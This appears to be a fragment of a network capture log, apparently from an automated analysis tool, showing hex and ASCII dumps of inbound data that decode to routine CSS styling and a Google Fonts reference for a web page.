2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 29 7d 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 61 38 63 37 66 61 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2c 23 61 38 63 37 66 61 29 3b 63 6f 6c 6f 72 3a 23 30 36 32 65 36 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 70 72 69 6d 61 72 79 2c 23 30 36 32 65 36 66 29 7d 2e 79 5a 71 4e 6c 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 70 61 63 69 74 79 3a 30 3b 62 Data Ascii: 2px 0 rgba(0,0,0,.3)}.NKmFNc .yZqNl{background:#a8c7fa;background:var(--gm3-sys-color-primary,#a8c7fa);color:#062e6f;color:var(--gm3-sys-color-on-primary,#062e6f)}.yZqNl::before{content:" ";position:absolute;top:0;left:0;width:100%;height:100%;opacity:0;b
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 79 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 62 35 37 64 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2c 23 30 62 35 37 64 30 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 35 73 20 65 61 73 65 2d 6f 75 74 7d 2e 6b 42 32 75 35 65 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 34 37 37 37 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 75 74 6c 69 6e 65 2c 23 37 34 37 37 37 35 29 7d 2e 6b 42 32 75 35 65 3a 68 6f 76 65 72 3a 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e Data Ascii: y:0;border-radius:100px;background:#0b57d0;background:var(--gm3-sys-color-primary,#0b57d0);transition:opacity .5s ease-out}.kB2u5e:hover{background:none;border-color:#747775;border-color:var(--gm3-sys-color-outline,#747775)}.kB2u5e:hover::before{opacity:.
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 76 65 72 3a 66 6f 63 75 73 2c 2e 51 73 58 4a 4a 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 66 6f 63 75 73 2c 2e 51 73 58 4a 4a 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 51 73 58 4a 4a 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 61 63 74 69 76 65 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 68 6f 76 65 72 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 68 6f 76 65 72 3a 66 6f 63 75 73 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 66 6f 63 75 73 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 61 63 74 69 76 65 7b Data Ascii: ver:focus,.QsXJJ.NKmFNc .yZqNl:focus,.QsXJJ.NKmFNc .yZqNl:focus-visible,.QsXJJ.NKmFNc .yZqNl:active,.amE0Md.NKmFNc .yZqNl:hover,.amE0Md.NKmFNc .yZqNl:hover:focus,.amE0Md.NKmFNc .yZqNl:focus,.amE0Md.NKmFNc .yZqNl:focus-visible,.amE0Md.NKmFNc .yZqNl:active{
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 36 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 7d 2e 79 76 79 59 59 20 2e 6f 69 71 6d 6e 63 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 34 36 70 78 7d 2e 6f 69 71 6d 6e 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 7b 77 69 64 74 68 3a 31 36 70 78 7d 2e 6f 69 71 6d 6e 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 34 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e Data Ascii: ;min-height:86px;overflow-y:auto;padding-left:20px;padding-right:20px}.yvyYY .oiqmnc{min-height:46px}.oiqmnc::-webkit-scrollbar{width:16px}.oiqmnc::-webkit-scrollbar-thumb{background:rgb(218,220,224);background-clip:padding-box;border:4px solid transparen
2024-12-04 11:20:23 UTC	2131	IN	Data Raw: 30 3b 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 34 6d 78 4b 2e 77 6f 66 66 32 29 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 55 2b 30 30 30 30 2d 30 30 46 46 2c 55 2b 30 31 33 31 2c 55 2b 30 31 35 32 2d 30 31 35 33 2c 55 2b 30 32 42 42 2d 30 32 42 43 2c 55 2b 30 32 43 36 2c 55 2b 30 32 44 41 2c 55 2b 30 32 44 43 2c 55 2b 30 33 30 34 2c 55 2b 30 33 30 38 2c 55 2b 30 33 32 39 2c 55 2b 32 30 30 30 2d 32 30 36 46 2c 55 2b 32 30 41 43 2c 55 2b 32 31 32 32 2c 55 2b 32 31 39 31 2c 55 2b 32 31 39 33 2c 55 2b 32 32 31 32 2c 55 2b 32 32 31 35 2c 55 2b 46 45 46 46 2c 55 2b 46 Data Ascii: 0;src:url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+F